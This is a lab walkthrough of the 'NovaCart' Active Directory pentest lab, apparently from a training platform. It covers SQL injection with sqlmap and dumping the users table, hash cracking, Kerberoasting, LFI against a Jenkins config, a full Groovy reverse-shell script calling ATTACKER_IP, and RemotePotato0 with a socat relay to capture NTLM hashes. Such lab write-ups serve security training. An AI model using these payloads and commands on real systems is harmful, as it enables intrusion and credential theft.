> For the complete documentation index, see [llms.txt](https://hackhunter-hacking.gitbook.io/hackhunter-hacking/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hackhunter-hacking.gitbook.io/hackhunter-hacking/hack-smarter-labs/novacart-active-directory.md).

# NovaCart - Active Directory

Hard Rated - Hack Smarter Labs

## Objective

* NovaCart is an e-commerce company that operates a webshop for PC accessories. However, the entire platform is still under active development and expansion. The IT team is currently working on a Linux-based version of the webshop as well as the development of a mobile app for NovaCart. The team is focused on adding features quickly, and has not prioritized security. We have been tasked with conducting a penetration test to thoroughly assess the environment, identify vulnerabilities, and evaluate the overall security of the system.
* The client has provided you with VPN access to their internal network, but no credentials.

## Initial Scan

### RustScan

{% code expandable="true" %}

```
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 126 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: NovaCart | Premium PC Components & Gaming Systems
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-18 20:30:46Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: novacart.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 126
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: novacart.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 126
3306/tcp  open  mysql         syn-ack ttl 126 MySQL (unauthorized)
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-05-18T20:31:57+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC.novacart.local
| Issuer: commonName=DC.novacart.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-24T22:48:49
| Not valid after:  2026-06-25T22:48:49
| MD5:     a249 9621 0853 5fcf e1ef 3afa 9c7a cc4d
| SHA-1:   41ed a1cd 8946 344c 3b16 f4e9 873a 5975 6658 b8b1
| SHA-256: 4b64 4c7b f9f7 bb04 e3f4 0326 7d8e b15c 3e52 3a3a ffe6 5c84 ceaf c121 2826 525d
| rdp-ntlm-info: 
|   Target_Name: NOVACART
|   NetBIOS_Domain_Name: NOVACART
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: novacart.local
|   DNS_Computer_Name: DC.novacart.local
|   DNS_Tree_Name: novacart.local
|   Product_Version: 10.0.17763
|_  System_Time: 2026-05-18T20:31:50+00:00
5000/tcp  open  http          syn-ack ttl 126 Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  NTLM
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
| http-ntlm-info: 
|   Target_Name: NOVACART
|   NetBIOS_Domain_Name: NOVACART
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: novacart.local
|   DNS_Computer_Name: DC.novacart.local
|   DNS_Tree_Name: novacart.local
|_  Product_Version: 10.0.17763
5985/tcp  open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http          syn-ack ttl 126 Jetty 12.0.25
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-server-header: Jetty(12.0.25)
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
33060/tcp open  mysqlx        syn-ack ttl 126 MySQL X protocol listener
47001/tcp open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10|2012|2022|2016 (93%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2019 (93%), Microsoft Windows 10 1909 (90%), Microsoft Windows 10 1909 - 2004 (90%), Windows Server 2019 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2022 (89%), Microsoft Windows 10 20H2 (87%), Microsoft Windows 10 20H2 - 21H1 (87%), Microsoft Windows Server 2012 Data Center (87%), Microsoft Windows Server 2016 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=5/18%OT=53%CT=%CU=34452%PV=Y%DS=3%DC=T%G=N%TM=6A0B773F%P=x86_64-pc-linux-gnu)
SEQ(SP=101%GCD=1%ISR=109%TI=I%CI=I%TS=U)
SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%TS=U)
OPS(O1=M510NW8NNS%O2=M510NW8NNS%O3=M510NW8%O4=M510NW8NNS%O5=M510NW8NNS%O6=M510NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M510NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=N)

Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-05-18T20:31:52
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 9486/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 44253/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51288/udp): CLEAN (Timeout)
|   Check 4 (port 6414/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
```

{% endcode %}

## Initial Enumeration

### HTTP Enumeration (80, 8080)

* We are starting without creds and thus we will need to enumerate other ways to gain entry. I noticed that there is a web server running on port 80 and 8080:
* Port 80 shows that there is a NovaCart webserver running:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FJdIMjIEJZ3VM9Ds9ZT7v%2Fimage.png?alt=media&amp;token=bdbd0a0c-8a00-4619-86e4-1bb9aab450e7" alt=""><figcaption></figcaption></figure>

* Port 8080 shows that a Jenkins instance is running:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FtjqT086RSy1eoqlxlXxh%2Fimage.png?alt=media&amp;token=0261c2a2-0c79-480b-a16a-7dd3f1efbe0a" alt=""><figcaption></figcaption></figure>

* It appears that we can cause a Runtime Error in the application when supplying certain parameters to the search box. In this case, I provided 'OR 1=1;'. The text box appears to be vulnerable:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FzrvQsGmY6wOY6LPUb8Eg%2Fimage.png?alt=media&amp;token=fe47cb45-eda2-4035-affe-92294a69e4ae" alt=""><figcaption></figcaption></figure>

### SQLMAP

* It appears that <http://novacart.local/search.aspx?q=test> might have a SQL vulnerability. If we can exploit this, we could possibly gain access to the underlying database that is present. I will run the potentially vulnerable URL against SQLMAP:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F3pXMrYIhCWIXx4McTbOB%2Fimage.png?alt=media&amp;token=81e40e92-9959-4062-adf2-5ea856103615" alt=""><figcaption></figcaption></figure>

* SQLMAP is able to find available databases from the vulnerable URL. There is a NovaCart database that appears interesting:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FtcanssUxL2Cuzt6rMVYA%2Fimage.png?alt=media&amp;token=58c037e2-38cc-4dc6-a3f0-bbb78685c762" alt=""><figcaption></figcaption></figure>

* We can then use SQLMAP to list our the tables of the NovaCart database:

{% code expandable="true" %}

```
sqlmap -u 'http://novacart.local/search.aspx?q=test' -D NovaCart
```

{% endcode %}

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FMzcpcFz8jRDQlMqwugil%2Fimage.png?alt=media&amp;token=26b2061d-b6e0-4da3-862f-f5a4618d0b7e" alt=""><figcaption></figcaption></figure>

* Now we can attempt to dump the users tables and see usernames and hashes:

{% code expandable="true" %}

```
sqlmap -u 'http://novacart.local/search.aspx?q=test' -D NovaCart -T users --dump
```

{% endcode %}

* We can take these usernames and hashes and put them into a file to attempt to crack them. This could give us a way further into the network:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F4mS3tp3YA66z5i7nLNpS%2Fimage.png?alt=media&amp;token=efcbc8ed-36ec-4be1-b604-20e439b8869e" alt=""><figcaption></figcaption></figure>

* We need to identify the hash type that is being used. We can take these hashes and use hash identifier to get a list of possible encryption methods:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FXUVLherXQ8wF4RLqKmUS%2Fimage.png?alt=media&amp;token=9288c0d4-10c1-46d2-82a0-2851642edfee" alt=""><figcaption></figcaption></figure>

* Using the Hashcat Wiki <https://hashcat.net/wiki/doku.php?id=example_hashes> we can look at possible hash modes to run that match our current hash file. We will try the following and will see that we are successful:

{% code expandable="true" %}

```
hashcat -a0 -m1420 hashes.txt /usr/share/wordlists/rockyou.txt
```

{% endcode %}

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F0B9Fy277K0uZ5zuD3iMm%2Fimage.png?alt=media&amp;token=e346fca4-5507-455a-8f20-b5d4354db590" alt=""><figcaption></figcaption></figure>

* Testing these users against the DC, we can see that we can login:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FCN7xy8SzVjvRZRkmV2C3%2Fimage.png?alt=media&amp;token=b2ee2539-c67e-4947-a6c1-63cfba7e7796" alt=""><figcaption></figcaption></figure>

### SMB Enumeration (445)

* We can see that there is a Shares share that we have read access to as one of our users:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fd5YvO8nczfyNpZjnGrCE%2Fimage.png?alt=media&amp;token=dd806cd8-564e-430e-8849-8ef24ae38786" alt=""><figcaption></figcaption></figure>

* We can enumerate further and see the following directories on the SMB share:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FjPMYlCH2P23CR0FpU7nb%2Fimage.png?alt=media&amp;token=c6967c40-7919-45fd-afd9-9c708a54e14a" alt=""><figcaption></figcaption></figure>

* Within these directories, there are some interesting sub directories and files. Mainly txt files pertaining to previous IT tickets as well as references to the Jenkins instance that is running:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FeqWV9tsO3F6YlUtp5wjW%2Fimage.png?alt=media&amp;token=63fded91-3f42-4f79-a0da-b80477271af9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FYvjZHjeG3YZXYr4tFSnh%2Fimage.png?alt=media&amp;token=c070019b-bca2-4973-ae7d-00947788a662" alt=""><figcaption></figcaption></figure>

* Among some of the files, we can see that there are some interesting ones that show a user j.dillon who was previously part of the IT team that we might be able to act as if this users Autologon has not been removed:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FFJIo8i6ytcPVWSXcMGur%2Fimage.png?alt=media&amp;token=7e0d613e-f11d-44fe-83ad-271056151251" alt=""><figcaption></figcaption></figure>

* User cliff.b appears to work as a Senior DevOps. This role could potentially have high permissions that, if misconfigured, could work to our advantage:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F776EpxJ8CHSA0QqqWOPZ%2Fimage.png?alt=media&amp;token=ac6ca187-ab87-43a8-be29-ac1e7fb61194" alt=""><figcaption></figcaption></figure>

* There is also a web config file that shows that WebApp\_Operators are allowed to do the following. Interesting, we will table this for now:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fo1ktD9D8M8nAElJWuuKf%2Fimage.png?alt=media&amp;token=22c34f1b-132b-4126-b42e-77620dc3b0d4" alt=""><figcaption></figcaption></figure>

* Additionally, there are Backup files that have file paths for the Jenkins instance. These might be useful later:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FJIHVpu8dF2W0D9rvYew0%2Fimage.png?alt=media&amp;token=fe2dce66-8f59-4293-a29a-fbfbd7ea567e" alt=""><figcaption></figcaption></figure>

## Kerberoasting Attempt

* Attempting a Kerberoast attack, we can see that a user has an SPN set. We can take this hash and attempt to crack it:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FKfrLeh3BuMtjqJIfRSxA%2Fimage.png?alt=media&amp;token=e6af56ac-87b1-41f1-958a-f627975006c6" alt=""><figcaption></figcaption></figure>

* Running this hash against rockyou.txt did not produce a password. We will pivot for the time being and come back if we need to.

## Manual LDAP Enumeration

* Ok, at this point we do have valid AD creds, so we can enumerate LDAP and ACLs to find an attack path. I will start by checking the users that we have thus far. We can see that d.barowski is a member of the 'IT Support' group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FPG3vHog71tgwaMI0GHuh%2Fimage.png?alt=media&amp;token=e5f4616b-5568-48ec-a4dc-b7f099243fab" alt=""><figcaption></figcaption></figure>

* Using bloodyAD, we can see that d.barowski has write permissions on a lot of users:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FimjRlV8zt12iarCCvuA7%2Fimage.png?alt=media&amp;token=873526a3-2fdc-4aba-b466-1d1c701c198c" alt=""><figcaption></figcaption></figure>

* We can look at these users to see what groups they are members of to see who might be a valuable target to go after. j.bronski and l.thompson have membership to groups that I am highly interested in:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FnKMCr6yhvkfkqvrsb1fD%2Fimage.png?alt=media&amp;token=9ad1956e-5ec2-4e58-89f9-7171eb3d28bd" alt=""><figcaption></figcaption></figure>

* We can see that user j.barowski has the following ACEs over the above interesting users:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fm5ME1DioMA3ILHhEWgsJ%2Fimage.png?alt=media&amp;token=d7f764d8-55dd-4f1b-8818-17ddc8c6cef9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FCGmCQiFe52dhepHAJQW6%2Fimage.png?alt=media&amp;token=3565f1f2-93f0-4014-a6db-40c404914437" alt=""><figcaption></figcaption></figure>

* Given we have write permissions over the user j.bronski, we could attempt to write an SPN to the user and then perform a targetedKerberoast attack against that user. This due to the GenericWrite permissions <https://bloodhound.specterops.io/resources/edges/generic-write#genericwrite> we have over the user:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fuv1s1ahlDWinMMKsfxLH%2Fimage.png?alt=media&amp;token=00ce16bc-5c10-4dec-a4e8-e60bac883d51" alt=""><figcaption></figcaption></figure>

* Using Hashcat, we are able to crack the hash and get the password for j.bronski:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fk91HiYggrxR5lZxM4G5Z%2Fimage.png?alt=media&amp;token=71687ce0-a5d1-45a1-bffa-33ee16546c6f" alt=""><figcaption></figcaption></figure>

## Gaining Access as User 'j.bronski'

* We will recall from the scan that port 5000 is open. Perhaps we could login as this user since they are a member of the WebApp\_Operators group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FcMTWwqdiVhu7tIIdbmk3%2Fimage.png?alt=media&amp;token=5e3752f9-4546-4385-b03b-fc59e57ff379" alt=""><figcaption></figcaption></figure>

* Upon gaining access, we can see that we are presented with the CI/CD pipeline Jenkins instance. It looks like svc\_jenkins is running this service (important service account to note down). Additionally, there is a IT Management Portal that is available:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FSDkjuJQ9rePNqEdWQRo3%2Fimage.png?alt=media&amp;token=98c72738-1da6-42de-a0e4-d66a563f65a1" alt=""><figcaption></figcaption></figure>

* Clicking on this, we are presented with the following. The URL appears to be pulling a file 'it\_team.aspx':

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fx7RKp4Cc5KaKxBMpsU3J%2Fimage.png?alt=media&amp;token=cc951384-3532-414a-9f56-5ba38f9892da" alt=""><figcaption></figcaption></figure>

* Modifying the URL throws this response. There could be an LFI vulnerability that we could possibly gain access to sensitive files if done correctly:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FsRDV0GGVqGwVrvAeHqqK%2Fimage.png?alt=media&amp;token=39a4473c-4219-40c4-b5c7-722e261ec631" alt=""><figcaption></figcaption></figure>

* Recall previously that the Backup files we grabbed from the 'Shares' share showed the directory paths for the jenkins.ini file. We can attempt to conduct an LFI attack and change directories to try and list out the contents of that file. We are able to find a password for jbronski and it appears to be to the Jenkins instance running on port 8080:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FAhte7ivXgHxCm58dIOZi%2Fimage.png?alt=media&amp;token=9415ebba-5f31-4161-9550-cbbf2ee8e03f" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Conducting LFI was possible due to the WebApp not properly handling the file path passed in the file parameter in the URL
{% endhint %}

* Supplying the username and password allows us to gain entry to the Jenkins instance:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fx6PZpXL8eAFxeQJlZ8d5%2Fimage.png?alt=media&amp;token=6a65f7a0-d8f2-4419-91d0-d18a524bab99" alt=""><figcaption></figcaption></figure>

* We can now observe a previous build done by Jan Bronski that is running as SYSTEM. If we can build and run either a command or shell, we might be able to gain access as SYSTEM or possibly svc\_jenkins that we observed earlier:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FD3FMCwRetaIDveVfUSOl%2Fimage.png?alt=media&amp;token=7315e727-e85d-43d0-ba2b-3de0a5508018" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Configuring and running a shell build was not working, but we are able to gain access to the ScriptConsole
{% endhint %}

* We can access the script console, which allows us to run a Groovy script. We can use this to try and gain a reverse shell:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F4lkShXoj5VgjDL4hwjQi%2Fimage.png?alt=media&amp;token=3f079245-6dc5-4e0b-b778-e59fad6f6c6a" alt=""><figcaption></figcaption></figure>

## Access as 'svc\_jenkins'

* Conducting OSINT, I find the following command that we can run for a Windows host to gain a reverse shell:

{% code expandable="true" %}

```
String host="ATTACKER_IP";
int port=ATTACKER_PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}};
p.destroy();
s.close();
```

{% endcode %}

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FiXcUeWCBarYswg81hoQu%2Fimage.png?alt=media&amp;token=b82469b3-b51a-48a0-80c3-464a9d9793d1" alt=""><figcaption></figcaption></figure>

* We can start to query the host for information. One thing that I remembered from the txt files is that j.dillon still has an AutoLogon configuration set on the DC. This means that this user might still have an active session on the DC that we could possibly gain access to. I will enumerate this by looking at the following registry key:

{% code expandable="true" %}

```
reg query 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
```

{% endcode %}

{% hint style="info" %}
The HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key will show information regarding logged on users
{% endhint %}

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FPmfWI2ZplzcDVI71wXZt%2Fimage.png?alt=media&amp;token=57177aec-f5c0-4659-8ab9-1f510d1eacca" alt=""><figcaption></figcaption></figure>

## RemotePotato0 Exploit

* Given that there is a local session that we have confirmed is running, we can attempt to use a potato attack, specifically the RemotePotato0. With this exploit, we are trying to trigger NTLM authentication on behalf of the user (j.dillon) who's session is running on the server that we have a session on as svc\_jenkins.

* For this attack to work, we need the following:

* A compromised domain account whose privileges enable it to connect over RDP to a remote server potentially visited by privileged users. In fact, this condition is met almost everywhere since terminal servers visited by domain admins from time to time are present nearly on any network. <- (We have this)

* A host on the intranet controlled by the attacker that has network connectivity with the attacked server on port 135/TCP <- (We have this)

* An unprotected endpoint with domain authentication where you can relay Net-NTLMv2 authentication that comes to your HTTP server. An ideal variant would be LDAP(S) services or the standard Microsoft AD CS web application <- (We have this)

* The ability to execute the RemotePotato0 exploit on the attacked server bypassing antivirus protection. (We will need to determine if this is stopped by Defender or not)

* Per this article <https://hackmag.com/security/remotepotato0>,This potato attack takes advantage of DCOM requests. Our attack will consist mirroring traffic arriving on port 135/TCP back to the victim host where a fake OXID resolver has been started; The COM object contains a malicious object that point back to our Kali host and will relay NTLM information of the logged in session that is present (j.dillon).

* I will start by downloading the RemotePotato0 binary:

{% code expandable="true" %}

```
curl https://github.com/antonioCoco/RemotePotato0/releases/download/1.2/RemotePotato0.zip -o RemotePotato0.zip
```

{% endcode %}

* Next, I will transfer the binary to the host. Running the binary, we can see that this is not picked up by Defender:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FFyO1KCr72ui7lVfQNmDi%2Fimage.png?alt=media&amp;token=049bb312-2eda-4f8f-b3fa-86c58c21be33" alt=""><figcaption></figcaption></figure>

* Per the above article, we can use socat to start a listener on our Kali host. The below will open up a bidirectional listener for connections on port 135:

{% code expandable="true" %}

```
sudo socat -v TCP-Listen:135,fork,reuseaddr TCP:<victim host>:9998
```

{% endcode %}

* Next, we will run the potato exploit on the victim host. We will use module 2 to capture the hash and resolve to our localhost listening on port 9998 as the place to send the hash:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FJbx5eSIzhu3We1WU3VBV%2Fimage.png?alt=media&amp;token=21ec5fd0-8611-4536-b565-dcdc39af128a" alt=""><figcaption></figcaption></figure>

* The connection is passed to our Kali host and then we are able to gain access to the user j.dillon hash:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fv4NPBuklvPQnWLvN3FK3%2Fimage.png?alt=media&amp;token=f6230944-ebdf-4da1-8854-03b33085a362" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FfdADspJPAAms9AuBHzhW%2Fimage.png?alt=media&amp;token=6d7e09d5-796b-4efb-b9d4-9d792164d082" alt=""><figcaption></figcaption></figure>

### Cracking the Hash

* We can now take this NTLMv2 hash and attempt to crack it ,which we are:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FDDR1U8bRR7vhbnQ2gc62%2Fimage.png?alt=media&amp;token=0bad64f5-3bd5-4755-82fb-b72814f83d0a" alt=""><figcaption></figcaption></figure>

## Enumeration as User 'j.dillon'

* User j.dillon has Write permissions over the IT Helpdesk group. With the WriteOwner permissions, I can take control of this group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FdkPQT81LCWLn0yVqfgdY%2Fimage.png?alt=media&amp;token=d49b4e82-c305-4106-8435-5729f07989d0" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FqzPLi2QIYkhQRqlQgweu%2Fimage.png?alt=media&amp;token=aac7d312-f421-4c5d-92f6-823ed6d35451" alt=""><figcaption></figcaption></figure>

* After some manual LDAP enumeration, we can see that IT Helpdesk has the following ForceChangePassword permissions over the l.thompson account, that is a member of the Remote Management Users group and can gain remote access:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FWI26nQuCSlGBOO6mQuTF%2Fimage.png?alt=media&amp;token=76be353e-42e4-41f9-ad7a-f8658a50b073" alt=""><figcaption></figcaption></figure>

